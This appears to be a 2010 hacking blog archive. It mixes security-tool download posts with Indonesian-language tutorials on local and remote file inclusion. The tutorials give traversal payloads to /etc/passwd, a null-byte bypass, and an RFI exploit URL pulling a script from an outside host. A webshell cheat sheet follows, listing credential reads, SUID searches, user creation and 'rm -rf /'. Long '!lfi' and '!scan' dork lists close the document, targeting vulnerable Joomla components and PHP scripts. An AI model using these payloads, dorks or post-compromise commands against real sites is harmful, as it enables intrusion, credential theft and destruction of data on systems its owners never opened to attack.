Get The Code And Feel The Soul: 2010

Unreal 3.2.9-rc1 released for testing

I've released Unreal3.2.9-rc1 (Release Candidate 1) for testing.
There have been a lot of changes - twice as much as usual - since 3.2.8(.1), so this is just the first in a series of RC's for Unreal3.2.9.

Members from the public are welcome to test if there are any major release critical bugs (eg: crash bugs) present, so they can be corrected before the real 3.2.9 release. If you want to help out testing a bit, check out the downloads below. Note that 3.2.9-rc1 should NOT be used at production servers!

For downloads, see www.unrealircd.com -> Downloads.

If you're willing to help some more, maybe you could help out in the Unreal3.2 testing forum as well, to test specific test-items, be sure to read the first post ('READ THIS! (how to use)').

Release notes are here.

PacketFence NAC System

If you want more control over which devices or endpoints access the network, PacketFence is for you. If you are looking at giving only Internet access to guests on your network, PacketFence is for you. If your network is a breeding ground for attacks, computer viruses or worms, PacketFence is for you.

PacketFence is a network access control (NAC) system. It is actively maintained and has been deployed in numerous large-scale institutions. It can be used to effectively secure networks, from small to very large heterogeneous networks. PacketFence provides NAC-oriented features such as registration of new network devices, detection of abnormal network activities including from remote snort sensors, isolation of problematic devices, remediation through a captive portal, and registration-based and scheduled vulnerability scans.

Download here

Malicious Cryptography

Cryptology is the study of the hidden word. It is an essential technology in times of war and has been in existence for thousands of years. The strategic positioning of troops is both a logistical challenge as well as a challenge from the perspective of information theory, since command and control information is subject to interception. It may be argued that cryptography has always had a dark side, since an enemy that uses it effectively will be able to conceal future enemy troop movements and other valuable information from allied forces. However, Malicious Cryptography digs much deeper into the dual-edged nature of cryptography. It shows how modern cryptographic paradigms and tools, including asymmetric cryptography, pseudorandom generators, reduction arguments, the random oracle model, etc. can in fact be used to degrade system security. The book details advanced computer viruses, worms, and Trojan horse programs that mount unprecedented attacks against their hosts. In short, it provides a glimpse of the future of information warfare, and also covers many of the tools that can be used to guard against these advanced threats to computing environments.

Download here

Samurai v0.8 Released

Samurai Web Testing Framework v0.8 Released
This is quite a major release with the integration of metasploit, target applications and tons of tool updates. It is now DVD sized as it has out grown the CD release.
The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites

Starting with reconnaissance, we have included tools such as the Fierce domain scanner and Maltego. For mapping, we have included tools such WebScarab and ratproxy. We then chose tools for discovery. These would include w3af and burp. For exploitation, the final stage, we included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-test.

The Samurai project team is happy to announce the release of a development version of the Samurai Web Testing Framework. This release is currently a fully functional linux environment that has a number of the tools pre-installed.

Download here

OpenSCAP

The OpenSCAP Project was created to provide an open-source framework to the community which enables integration with the Security Content Automation Protocol (SCAP) suite of standards and capabilities. It is the goal of OpenSCAP to provide a simple, easy to use set of interfaces to serve as the framework for community use of SCAP.

SCAP is a line of standards managed by NIST. It was created to provide a standardized approach to maintaining the security of enterprise systems, such as automatically verifying the presence of patches, checking system security configuration settings, and examining systems for signs of compromise.

The SCAP suite contains multiple complex data exchange formats that are to be used to transmit important vulnerability, configuration, and other security data. Historically, there have been few tools that provide a way to query this data in the needed format. This lack of tools makes the barrier to entry very high and discourages adoption of these protocols by the community. It’s our goal to create a framework of libraries to improve the accessibility of SCAP and enhance the usability of the information it represents. Tools for parsing SCAP documents and querying content must be created to achieve this. This requires common set of interfaces to be defined and implemented to meet this need. It is the intent of this project to provide these interfaces and functional examples that would allow others in the open-source and vendor communities to make use of SCAP while minimizing the effort needed to gain value from it.

Download here

Proxy Switcher PRO v3.9.0.4

When you visit a particular website. Or your access to various social networking and entertainment sites has been blocked.

The solution is to use Proxy Switcher for all the anonymous browsing needs. It can be used to avoid all sorts of limitations imposed by various sites. Be that a download site that limits amount of downloads. Or video site works only in a particular country - more often than not it gets defeated by the anonymous browsing features Proxy Switcher provides.

On top of that, if you used to manually change proxy settings Proxy Switcher provides a way to change them much faster and easier.

Download here

Local File Inclusion (LFI)

Bagaimana Bug seperti bisa ada?

Disisi programer : Bagaimana cara pencegahan yang programer lakukan untuk mencegahnya.. ?
Disisi Attacker : Bagaimana cara menggunakan bug ini untuk penyerangan..?

sebelumnya apa sih LFI dan RFI itu??
LFI (Local File Inclusion) adalah sebuah lubang pada site dimana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.

fungsi-fungsi yang dapat menyebabkan LFI/RFI:
include();
include_once();
require();
require_once();

Dengan syarat pada kofigurasi server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off

masuk ke example
kita misal kan kita punya file index.php dengan content seperti ini

Code:
include($page);
?>

misal $page=main.php
mungkin di url akan terlihat seperti ini bentuknya
h**p://www.sitevulnerable.com/index.php?page=main.php
maka script ini akan menampilkan halaman main.php.

nah disini attacker akan dapat melakukan LFI karena variable page di include begitu saja.
misal attacker ingin mengakses file passwd yang ada pada sever maka dia mungkin akan memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah "../" itu tergantung dari kedalam folder file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser.
dengan kita bisa menebak folder" dalam site.. ^^

tapi seandainya terdapat error seperti
Quote

Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2

liat pada passwd ternyata dia di tambah dengan extensi .php berarti code yang digunakan untuk include adalah seperti ini

Code:

include($page.".php");
?>

nah untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti

h**p://www.sitevulnerable.com/index.php?page=../../../../../../../../../etc/passwd

lalu untuk apa ? yaitu untuk menghilangkan karakter setelah ini di sebut teknik null injection.
itu LFI.

Source

Remote File Inclusion (RFI)

Remote file inclusion dapat diartikan sebagai penyisipan sebuah file
dari luar suatu file dalam sebuah webserver dengan tujuan script
didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik
ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan
server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat
menggunakan bahasa script tersebut. Target remote file inclusion
biasanya berbentuk sebuah portal atau content management system (CMS)
sehingga banyak sekali jumlah website yang rawan terhadap serangan
tipe ini.

Dalam artikel ini kita akan lebih banyak membahas bagaimana proses
file inclusion (yang selanjutnya kita sebut dengan istilah `injeksi’)
bisa terjadi dalam bahasa PHP.

° BAGAIMANA BISA TERJADI?
———————–

Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau
ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file.
Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara
benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri
dari:

1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)

Variabel dalam PHP mempunyai sintaks:

#1 include ($namavariable. “/file…”)
#2 require_once ($namavariable. /file…)
#3 include_once ($variable. /file…)

Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya
terdapat variabel seperti ini:

…
include($my_ms["root"].’/error.php’);
…

Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar
webserver dengan eksploit script injeksi PHP:

http://www.target.com/[Script

Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?

Diatas adalah contoh eksploitasi MySpeach < = v3.0.2 (my_ms[root])

2. Setting dalam file PHP.ini

#1. register_globals=On
#2. magic_quotes=off
#3. allow_fopenurl=on

° BERBAHAYAKAH?
————-

File inclusion memiliki level resiko tinggi (High Risk) bahkan level
sangat berbahaya (Very Dangerous) karena injeksi memperkenankan
pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote
Commands Execution) terhadap server. Tindakan ini sangat membahayakan
bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses
lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa
saja pelaku mendapatkan akses administrator atau root.

Secara garis besar resiko serangan ini adalah:

1. Web root folder / subdirectory defacing.
2. Previledge escalation (mendapatkan hak akses lebih tinggi).
3. Menjalankan proses dalam server (psyBNC, bots, dsb)
4. Pilfering a.k.a pencurian data (such as credentials information,
credit cards, etc..)
5. Dan banyak lagi…!!! Termasuk tindakan pengambilalihan server dan
ddos!

° SISTEM OPERASI APA YANG KEBAL?
——————————

Saya teringat permainan C&C Generals (my fave game!) saat seorang
hacker keluar dari barak. Mereka mengucapkan “NO SYSTEMS IS SAFE!”.
Tepat sekali! Tidak ada sistem operasi yang aman dari serangan injeksi
selama mereka menggunakan server side scripting yang dapat
dieksploitasi, tak peduli apakah itu Microsoft Windows, LINUX,
FreeBSD, Solaris, Darwin OS, dan lain-lainnya.

° APA YANG HARUS DILAKUKAN?
————————-

Banyak sekali portal dan komunitas white hat yang sering merilis bugs
terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan
perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit
perbaikan yang berarti terhadap CMS yang mungkin sekarang anda
gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan
hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET
/index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga,
karena bisa saja ini serangan terhadap web atau portal yang anda kelola.

Salah satu tehnik paling aman bagi seorang administrator adalah selalu
memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal.
Gunakan firewall guna mencegah penyusupan orang-orang yang tidak
bertanggung jawab dan memperhatikan port-port server yang sedang terbuka.

° ENDING
——

Artikel ini saya tulis berdasarkan apa yang saya ketahui, dan jika
terdapat kesalahan karena ketidaktahuan saya anda dapat menghubungi
saya lewat email. Pengalaman adalah guru yang terbaik untuk kita
semua. Semua bisa saja terjadi karena tidak ada pribadi yang
diciptakan sempurna. Nobody is perfect! No systems is safe!

° REFERENSI
———

- http://net-square.com/papers/one_way/one_way.html (Very simple
haxing guides)
- www.milw0rm.com (Nice place to looking for exploits and buggy things)
- http://www.packetstormsecurity.org (Great advisory, toolz, and
exploits archives)
- www.google.com (Greatest place to ask! )
- http://www.ultrapasswords.com/ (Place to cooling down… We love
streaming vids! Yeah!)

Source

Perintah Webshell

cat ./../mainfile.php = Config file.

ls -la = Lists directory’s.

ifconfig {eth0 etc} = Ipconfig equiv.

ps aux – Show running proccess’s.

gcc in_file -o out_file – Compile c file.

cat /etc/passwd – List’s accounts.

sudo – Superuser Do run a command as root provided you have perms
in /etc/sudoers.

id – Tells you what user your logged in as.

which wget curl w3m lynx – Check’s to see what downloaders are
present.

uname -r – Shows all release info (or) cat /etc/release.

uname -a – Shows all kernal info (or) cat /etc/issue

last -30 – Last logged 30 ip’s can change to desired number.

useradd – Create new user account.

usermod – Modify user account.

w – See who is currently logged on.

locate password.txt – Locates password.txt in current dur can use *.

rm -rf / – Please be carefull with this command, i cannot stress this
enough.

arp -a – Lists other machines are on the same subnet.

lsattr -va – ls file attributes on linux second extended file system

find / -type f -perm -04000 -ls – Finds suid files.

find . -type f -perm -04000 -ls – Finds suid files in current dir.

find / -type f -perm -02000 -ls – Finds all sgid files.

find / -perm -2 -ls – Finds all writable files and folders.

find . -perm -2 -ls – Finds all writable files and folders in current dir.

find / -type f -name .bash_history – Finds bash history.

netstat -an | grep -i listen – shows open ports.

cut -d: -f1,2,3 /etc/passwd | grep :: – From memory creates a user
with no pass.

find /etc/ -type f -perm -o+w 2> /dev/null – Write in /etc/passwd?.

cat /proc/version /proc/cpuinfo – Cpu info.

locate gcc- Finds gcc if installed.

set – Display system variables.

echo $path- Echo current path.

lsmod- Dumps kernal modules.

mount/df- Check mounted file system.

rpm -qa- Check patch level for RedHat 7.0.

dmesg- Check hardware ino.

cat /etc/syslog.conf – Log file.

uptime – Uptime check.

cat /proc/meminfo – Memory check.

find / -type f -perm -4 -print 2> /dev/null- Find readble files.

find / -type f -perm -2 -print 2> /dev/null – Find writable files.

chmod ### $folder – Chmod folder.

ls -l -b – Verbosly list directory’s

Silahkan ditambahkan sendiri ^:)^

Source

Bug Dork LFI

!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
!lfi /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
!lfi /index.php?option=com_sbsfile&controller= "com_sbsfile"
!lfi /index.php?option=com_rokdownloads&controller= "com_rokdownloads"
!lfi /index.php?option=com_sectionex&controller= "com_sectionex"
!lfi /index.php?option=com_ganalytics&controller= "com_ganalytics"
!lfi /index.php?option=com_janews&controller= "com_janews"
!lfi /index.php?option=com_linkr&controller= "com_linkr"
!lfi /index.php?option=com_rpx&controller= "com_rpx"
!lfi /index.php?option=com_ninjarsssyndicator&controller= "com_ninjarsssyndicator"
!lfi /index.php?option=com_gcalendar&controller= "com_gcalendar"
!lfi /index.php?option=com_ckforms&controller= "com_ckforms"
!lfi /index.php?option=com_jeformcr&view= "com_jeformcr"
!lfi /index.php?option=com_jresearch&controller= "com_jresearch"
!lfi /index.php?option=com_smestorage&controller= "com_smestorage"
!lfi /index.php?option=com_properties&controller= "com_properties"
!lfi /index.php?option=com_dwgraphs&controller= "com_dwgraphs"
!lfi /index.php?option=com_weberpcustomer&controller= "com_weberpcustomer"
!lfi /index.php?option=com_userstatus&controller= "com_userstatus"
!lfi /index.php?option=com_econtent&controller= "com_econtent"
!lfi /index.php?option=com_jvehicles&controller= "com_jvehicles"
!lfi /index.php?option=com_joomlapicasa2&controller= "com_joomlapicasa2"
!lfi /index.php?option=com_svmap&controller= "com_svmap"
!lfi /index.php?option=com_shoutbox&controller= "com_shoutbox"
!lfi /index.php?option=com_loginbox&view= "com_loginbox"
!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
!lfi /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
!lfi /index.php?option=com_sbsfile&controller= "com_sbsfile"
!lfi /index.php?option=com_rokdownloads&controller= "com_rokdownloads"
!lfi /index.php?option=com_sectionex&controller= "com_sectionex"
!lfi /index.php?option=com_ganalytics&controller= "com_ganalytics"
!lfi /index.php?option=com_janews&controller= "com_janews"
!lfi /index.php?option=com_linkr&controller= "com_linkr"
!lfi /index.php?option=com_rpx&controller= "com_rpx"
!lfi /index.php?option=com_ninjarsssyndicator&controller= "com_ninjarsssyndicator"
!lfi /index.php?option=com_gcalendar&controller= "com_gcalendar"
!lfi /index.php?option=com_ckforms&controller= "com_ckforms"
!lfi /index.php?option=com_jeformcr&view= "com_jeformcr"
!lfi /index.php?option=com_jresearch&controller= "com_jresearch"
!lfi /index.php?option=com_smestorage&controller= "com_smestorage"
!lfi /index.php?option=com_properties&controller= "com_properties"
!lfi /index.php?option=com_dwgraphs&controller= "com_dwgraphs"
!lfi /index.php?option=com_weberpcustomer&controller= "com_weberpcustomer"
!lfi /index.php?option=com_userstatus&controller= "com_userstatus"
!lfi /index.php?option=com_econtent&controller= "com_econtent"
!lfi /index.php?option=com_jvehicles&controller= "com_jvehicles"
!lfi /index.php?option=com_joomlapicasa2&controller= "com_joomlapicasa2"
!lfi /index.php?option=com_svmap&controller= "com_svmap"
!lfi /index.php?option=com_shoutbox&controller= "com_shoutbox"
!lfi /index.php?option=com_loginbox&view= "com_loginbox"
!lfi /index.php?option=com_bca-rss-syndicator&controller= "com_bca-rss-syndicator"
!lfi /index.php?option=com_joomlaupdater&controller= "com_joomlaupdater"
!lfi /index.php?option=com_redshop&view= "com_redshop"
!lfi /index.php?option=com_redtwitter&view= "com_redtwitter"
!lfi /index.php?option=com_wisroyq&controller= "com_wisroyq"
!lfi /index.php?option=com_jinventory&controller= "com_jinventory"
!lfi /index.php?option=com_appointment&controller= "com_appointment"
!lfi /index.php?option=com_datafeeds&controller= "com_datafeeds"
!lfi /index.php?option=com_fabrik&controller= "com_fabrik"
!lfi /index.php?option=com_hsconfig&controller= "com_hsconfig"
!lfi /index.php?option=com_joomlaflickr&controller= "com_joomlaflickr"
!lfi /index.php?option=com_jukebox&controller= "com_jukebox"
!lfi /index.php?option=com_jwhmcs&controller= "com_jwhmcs"
!lfi /index.php?option=com_sebercart&view= "com_sebercart"
!lfi /index.php?option=com_awiki&controller= "com_awiki"
!lfi /index.php?option=com_vjdeo&controller= "com_vjdeo"
!lfi /index.php?option=com_awdwall&controller= "com_awdwall"
!lfi /index.php?option=com_realtyna&controller= "com_realtyna"
!lfi /index.php?option=com_webeecomment&controller= "com_webeecomment"
!lfi /index.php?option=com_javoice&view= "com_javoice"
!lfi /index.php?option=com_foobla_suggestions&controller= "com_foobla_suggestions"
!lfi /index.php?option=com_powermail&controller= "com_powermail"
!lfi /index.php?option=com_pcchess&controller= "com_pcchess"
!lfi /index.php?option=com_spsnewsletter&controller= "com_spsnewsletter"
!lfi /index.php?option=com_alphauserpoints&view= "com_alphauserpoints"
!lfi /index.php?option=com_travelbook&controller= "com_travelbook"
!lfi /index.php?option=com_tweetla&controller= "com_tweetla"
!lfi /index.php?option=com_ticketbook&controller= "com_ticketbook"
!lfi /index.php?option=com_jajobboard&view= "com_jajobboard"
!lfi /index.php?option=com_jajobboard&controller= "com_jajobboard"
!lfi /index.php?option=com_jfeedback&controller= "com_jfeedback"
!lfi /index.php?option=com_jprojectmanager&controller= "com_jprojectmanager"
!lfi /index.php?option=com_preventive&controller= "com_preventive"
!lfi /index.php?option=com_myfiles&controller= "com_myfiles"
!lfi /index.php?option=com_onlineexam&controller= "com_onlineexam"
!lfi /index.php?option=com_joommail&controller= "com_joommail"
!lfi /index.php?option=com_memory&controller= "com_memory"
!lfi /index.php?option=com_market&controller= "com_market"
!lfi /index.php?option=com_diary&controller= "com_diary"
!lfi /index.php?option=com_webtv&controller= "com_webtv"
!lfi /index.php?option=com_horoscope&controller= "com_horoscope"
!lfi /index.php?option=com_arcadegames&controller= "com_arcadegames"
!lfi /index.php?option=com_flashgames&controller= "com_flashgames"
!lfi /index.php?option=com_addressbook&controller= "com_addressbook"
!lfi /index.php?option=com_flexicontent&controller= "com_flexicontent"
!lfi /index.php?option=com_advertising&controller= "com_advertising"
!lfi /index.php?option=com_cvmaker&controller= "com_cvmaker"
!lfi /index.php?option=com_worldrates&controller= "com_worldrates"
!lfi /index.php?option=com_record&controller= "com_record"
!lfi /index.php?option=com_sweetykeeper&controller= "com_sweetykeeper"
!lfi /index.php?option=com_beeheard&controller= "com_beeheard"
!lfi /index.php?option=com_blogfactory&controller= "com_blogfactory"
!lfi /index.php?option=com_delicious&controller= "com_delicious"
!lfi /index.php?option=com_jacomment&view= "com_jacomment"
!lfi /index.php?option=com_lovefactory&controller= "com_lovefactory"
!lfi /index.php?option=com_mtfireeagle&controller= "com_mtfireeagle"
!lfi /index.php?option=com_photobattle&view= "com_photobattle"
!lfi /index.php?option=com_s5clanroster&view= "com_s5clanroster"
!lfi /index.php?option=com_s5clanroster&controller= "com_s5clanroster"
!lfi /index.php?option=com_wgpicasa&controller= "com_wgpicasa"
!lfi /index.php?option=com_zimbcomment&controller= "com_zimbcomment"
!lfi /index.php?option=com_zimbcore&controller= "com_zimbcore"
!lfi /index.php?option=com_gadgetfactory&controller= "com_gadgetfactory"
!lfi /index.php?option=com_matamko&controller= "com_matamko"
!lfi /index.php?option=com_archeryscores&controller= "com_archeryscores"
!lfi /index.php?option=com_multiroot&controller= "com_multiroot"
!lfi /index.php?option=com_multimap&controller= "com_multimap"
!lfi /index.php?option=com_drawroot&controller= "com_drawroot"
!lfi /index.php?option=com_google&controller= "com_google"
!lfi /index.php?option=com_if_surfalert&controller= "com_if_surfalert"
!lfi /index.php?option=com_orgchart&controller= "com_orgchart"
!lfi /index.php?option=com_mmsblog&controller= "com_mmsblog"
!lfi /index.php?option=com_wmi&controller= "com_wmi"
!lfi /index.php?option=com_ultimateportfolio&controller= "com_ultimateportfolio"
!lfi /index.php?option=com_noticeboard&controller= "com_noticeboard"
!lfi /index.php?option=com_smartsite&controller= "com_smartsite"
!lfi /index.php?option=com_graphics&controller= "com_graphics"
!lfi /index.php?option=com_php&file= "com_php"
!lfi /index.php?option=com_aardvertiser&task= "com_aardvertiser"
!lfi /index.php?option=com_jejob&view= "com_jejob"
!lfi /index.php?option=com_jeajaxeventcalendar&view= "com_jeajaxeventcalendar"
!lfi /index.php?option=com_dioneformwizard&controller= "com_dioneformwizard"
!lfi /index.php?option=com_jequoteform&view= "com_jequoteform"
!lfi /index.php?option=com_mscomment&controller= "com_mscomment"
!lfi /index.php?option=com_simpledownload&controller= "com_simpledownload"
!lfi /index.php?option=com_event&view= "com_event"
!lfi /index.php?option=com_product&controller= "com_product"
!lfi /index.php?option=com_job&controller= "com_job"
!lfi /index2.php?option=com_simpledownload&controller= "com_simpledownload"
!lfi /index.php?option=com_perchaimageattach&controller= "com_perchaimageattach"
!lfi /index.php?option=com_perchafieldsattach&controller= "com_perchafieldsattach"
!lfi /index.php?option=com_perchadownloadsattach&controller= "com_perchadownloadsattach"
!lfi /index.php?option=com_perchagallery&controller= "com_perchagallery"
!lfi /index.php?option=com_perchacategoriestree&controller= "com_perchacategoriestree"
!lfi /index.php?option=com_beeheard&controller= index.php?option=com_beeheard
!lfi /index.php?option=com_arcadegames&controller= option=com_arcadegames
!lfi /index.php?option=com_flashgames&controller= "option=com_flashgames"
!lfi /index.php?option=com_addressbook&controller= "option=com_addressbook"
!lfi /index.php?option=com_advertising&controller= index.php?option=com_advertising
!lfi /index.php?option=com_cvmaker&controller= /index.php?option=com_cvmaker
!lfi /index.php?option=com_myfiles&controller= index.php?option=com_myfiles
!lfi /index.php?option=com_onlineexam&controller= "option=com_onlineexam"
!lfi /index.php?option=com_joommail&controller= /index.php?option=com_joommail
!lfi /index.php?option=com_memory&controller= "option=com_memory"
!lfi /index.php?option=com_market&controller= "?option=com_market"
!lfi /index.php?option=com_diary&controller= index.php?option=com_diary
!lfi /index.php?option=com_worldrates&controller= option=com_worldrates
!lfi /index.php?option=com_record&controller= index.php?option=com_record
!lfi /index.php?option=com_sweetykeeper&controller= index.php?option=com_sweetykeeper
!lfi /index.php?option=com_wgpicasa&controller= index.php?option=com_wgpicasa
!lfi /index.php?option=com_s5clanroster&view= /index.php?option=com_s5clanroster
!lfi /index.php?option=com_photobattle&view= index.php?option=com_photobattle
!lfi /index.php?option=com_mtfireeagle&controller= index.php?option=com_mtfireeagle
!lfi /index.php?option=com_lovefactory&controller= index.php?option=com_lovefactory
!lfi /index.php?option=com_jacomment&view= option=com_jacomment
!lfi /index.php?option=com_delicious&controller= index.php?option=com_delicious&controller=
!lfi /index.php?option=com_blogfactory&controller= index.php?option=com_blogfactory
!lfi /index.php?option=com_sebercart&view= index.php?option=com_sebercart
!lfi /index.php?option=com_jwhmcs&controller= index.php?option=com_jwhmcs
!lfi /index.php?option=com_jukebox&controller= index.php?option=com_jukebox
!lfi /index.php?option=com_joomlaflickr&controller= index.php?option=com_joomlaflickr
!lfi /index.php?option=com_hsconfig&controller= index.php?option=com_hsconfig
!lfi /index.php?option=com_fabrik&controller= index.php?option=com_fabrik
!lfi /index.php?option=com_datafeeds&controller= index.php?option=com_datafeeds
!lfi /index.php?option=com_appointment&controller= /index.php?option=com_appointment
!lfi /index.php?option=com_awiki&controller= index.php?option=com_awiki
!lfi /index.php?option=com_webeecomment&controller= index.php?option=com_webeecomment
!lfi /index.php?option=com_realtyna&controller= index.php?option=com_realtyna
!lfi /index.php?option=com_powermail&controller= index.php?option=com_powermail
!lfi /index.php?option=com_foobla_suggestions&controller= option=com_foobla_suggestions
!lfi /index.php?option=com_pcchess&controller= index.php?option=com_pcchess
!lfi /index.php?option=com_tweetla&controller= index.php?option=com_tweetla
!lfi /index.php?option=com_ticketbook&controller= index.php?option=com_ticketbook
!lfi /index.php?option=com_jfeedback&controller= index.php?option=com_jfeedback
!lfi /index.php?option=com_jprojectmanager&controller= index.php?option=com_jprojectmanager
!lfi /index.php?option=com_spsnewsletter&controller= index.php?option=com_spsnewsletter
!lfi /index.php?option=com_alphauserpoints&view= ndex.php?option=com_alphauserpoints
!lfi /index.php?option=com_travelbook&controller= index.php?option=com_travelbook
!lfi /index.php?option=com_webtv&controller= index.php?option=com_webtv
!lfi /index.php?option=com_horoscope&controller= index.php?option=com_horoscope
!lfi /index.php?option=com_rd_download&view=download&cid= index.php?option=com_rd_download
!lfi /index.php?option=com_abbrev&controller= index.php?option=com_abbrev
!lfi /index.php?option=com_otzivi&controller= index.php?option=com_otzivi
!lfi /index.php?option=com_juliaportfolio&controller= index.php?option=com_juliaportfolio
!lfi /index.php?option=com_sbsfile&controller= index.php?option=com_sbsfile
!lfi /index.php?option=com_gcalendar&controller= index.php?option=com_gcalendar
!lfi /index.php?option=com_ninjarsssyndicator&controller= index.php?option=com_ninjarsssyndicator
!lfi /index.php?option=com_rpx&controller= index.php?option=com_rpx
!lfi /index.php?option=com_linkr&controller= index.php?option=com_linkr
!lfi /index.php?option=com_janews&controller= option=com_janews
!lfi /index.php?option=com_ganalytics&controller= index.php?option=com_ganalytics
!lfi /index.php?option=com_sectionex&controller= index.php?option=com_sectionex
!lfi /index.php?option=com_rokdownloads&controller= option=com_rokdownloads
!lfi /index.php?option=com_rwcards&view=rwcards&controller= index.php?option=com_rwcards
!lfi /index.php?option=com_news_portal&controller= index.php?option=com_news_portal
!lfi /index.php?option=com_jinventory&controller= index.php?option=com_jinventory
!lfi /index.php?option=com_wisroyq&controller= index.php?option=com_wisroyq
!lfi /index.php?option=com_redtwitter&view= /index.php?option=com_redtwitter
!lfi /index.php?option=com_redshop&view= index.php?option=com_redshop
!lfi /index.php?option=com_weberpcustomer&controller= index.php?option=com_weberpcustomer
!lfi /index.php?option=com_userstatus&controller= option=com_userstatus
!lfi /index.php?option=com_jvehicles&controller= index.php?option=com_jvehicles
!lfi /index.php?option=com_econtent&controller= index.php?option=com_econtent
!lfi /index.php?option=com_dwgraphs&controller= index.php?option=com_dwgraphs
!lfi /index.php?option=com_smestorage&controller= index.php?option=com_smestorage
!lfi /index.php?option=com_properties&controller= index.php?option=com_properties
!lfi /index.php?option=com_jeformcr&view= index.php?option=com_jeformcr

Bug Dork RFI

!scan /chat_actions.php3?chat_phpIRC_path= "phpChat"
!scan /includes/fotools.php?imgs_path= "/fotools.php"
!scan /includes/fotools.php?imgs_path= "wa-boo"
!scan /library/class.backup.php?adminroot= "Direct News"
!scan /admin/menu_xml.php?rootpath= "Direct News"
!scan /admin/articles/edit.php?mainpath= "/edit.php"
!scan /admin/articles/edit.php?mainpath= "Faethon"
!scan /modules/dfss/lgsl/lgsl_players.php?lgsl_path= "/lgsl" "/lgsl"
!scan /modules/dfss/lgsl/lgsl_players.php?lgsl_path= "DaFun Spirit"
!scan ?id= "Projekt i realizacja: Euroadres"
!scan /components/com_moofaq/includes/file_includer.php?gzip=0&file= "component/option,com_moofaq"
!scan /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path= component/option,com_content
!scan ?mosConfig.absolute.path= component/option,com_
!scan /index.php?option=com_remository&Itemid=&mosConfig.absolute.path= component/option,com_remository
!scan /index.php?option=com_wrapper&Itemid=&mosConfig.absolute.path= component/option,com_wrapper
!scan /index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path= component/option,com_sefservicemap
!scan /index.php?option=com_sef&Itemid=&mosConfig.absolute.path= component/option,com_sef
!scan /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path= component/option,com_fabrik
!scan /administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path= "/universal"
!scan /administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path= "/com_universal"
!scan /administrator/components/com_jwmmxtd/admin.jwmmxtd.php?mosConfig_absolute_path= "jwmmxtd"
!scan /administrator/components/com_jwmmxtd/admin.jwmmxtd.php?mosConfig_absolute_path= "/com_jwmmxtd"
!scan /languages/yourlanguage/definitions.php?include= "/yourlanguage"
!scan /languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= "/yourlanguage"
!scan /languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= "Vanilla"
!scan /languages/yourlanguage/definitions.php?include= "Vanilla"
!scan /core/dispatcher.php?configRootDir= "/dispatcher"
!scan /template/babyweb/index.php?template= "WebMaid"
!scan /templates/template.php?content= "NotSopureEdit"
!scan /templates/template.php?content= "/template.php"
!scan /templates/template.php?content= "/templates" "/templates"
!scan /template/wm025/footer.php?modules= "/wm025" "/wm025"
!scan /template/babyweb/index.php?template= "/babyweb" "/babyweb"
!scan /errors.php?error= "/typo3conf" "/typo3conf"
!scan /errors.php?error= "/typo" "/typo"
!scan /errors.php?error= "/typo3" "/typo3"
!scan /sweetrice/_plugin/subscriber/inc/post.php?root_dir= "/sweetrice" "/sweetrice"
!scan /content/themes/softsaurus_default/pages/subHeader.php?objects_path= "/softsaurus" "/softsaurus"
!scan /content/themes/softsaurus_default/pages/subHeader.php?objects_path= "/subHeader" "/subHeader"
!scan /content/plugins/wallpapers/wallpapers.php?includes_path= "/wallpapers" "/wallpapers"
!scan /include/mail.inc.php?root= "/mail.inc"
!scan /include/mail.inc.php?root= "Rezervi"
!scan /inc/bbcode.php?basePath= "deV!L`z Clanportal"
!scan /forum/adminLogin.php?config[forum_installed]= Login | Privacy | Terms of Use | Services | FAQ's | Articles | Affiliate | Invite a Friend | Feedback
!scan /forum/adminLogin.php?config[forum_installed]= "osDate" "osDate"
!scan /forum/adminLogin.php?config[forum_installed]= "/forum" "/forum"
!scan /forum/adminLogin.php?config[forum_installed]= "/adminLogin"
!scan /inc/config.php?basePath= "Clanportal"
!scan /inc/config.php?basePath= "/config.php"
!scan /system/database/DB_active_rec.php?BASEPATH= "/database" "/database"
!scan /ecrire.php?lang= "mcGuestbook"
!scan /ecrire.php?lang= "/ecrire.php"
!scan /external.php?url= "/external"
!scan /external.php?url= "/external.php?url="
